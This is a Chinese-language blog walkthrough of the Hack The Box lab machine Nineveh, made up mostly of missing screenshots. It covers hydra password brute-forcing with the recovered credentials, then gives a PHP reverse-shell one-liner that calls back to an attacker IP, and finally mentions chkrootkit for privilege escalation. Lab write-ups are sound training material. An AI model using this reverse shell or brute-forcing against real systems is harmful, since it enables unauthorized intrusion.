您的位置: 首页  >  文章  >  Hack the box靶机 nineveh

Hack the box靶机 nineveh

分类: 文章 2024-04-16 11:55:13

Hack the box靶机 nineveh

添加10.10.10.43 nineveh.htb
到/etc/hosts

Hack the box靶机 nineveh

扫描网站目录
发现一个登录页面

Hack the box靶机 nineveh

直接hydra**账号

Hack the box靶机 nineveh

admin:1q2w3e4r5t

Hack the box靶机 ninevehHack the box靶机 ninevehHack the box靶机 nineveh

继续hydra

Hack the box靶机 nineveh

admin:password123

Hack the box靶机 ninevehHack the box靶机 nineveh

Hack the box靶机 nineveh
查看漏洞

Hack the box靶机 nineveh
Hack the box靶机 ninevehHack the box靶机 nineveh

Hack the box靶机 nineveh

没有返回
好像是必须在名称中包含ninevehNotes

Hack the box靶机 ninevehHack the box靶机 nineveh

可以了现在
nc连接
php -r ‘$sock=fsockopen(“10.10.16.118”,1234);exec("/bin/sh -i <&3 >&3 2>&3");’

Hack the box靶机 ninevehHack the box靶机 nineveh

Hack the box靶机 ninevehHack the box靶机 nineveh

Hack the box靶机 ninevehHack the box靶机 ninevehHack the box靶机 ninevehHack the box靶机 ninevehHack the box靶机 nineveh

拿到user
但是root就没思路了
只能借鉴大佬的了
之前发现的那个东西
是chkrootkit

Hack the box靶机 nineveh

Hack the box靶机 nineveh

等待chkrootkit运行

Hack the box靶机 nineveh

相关推荐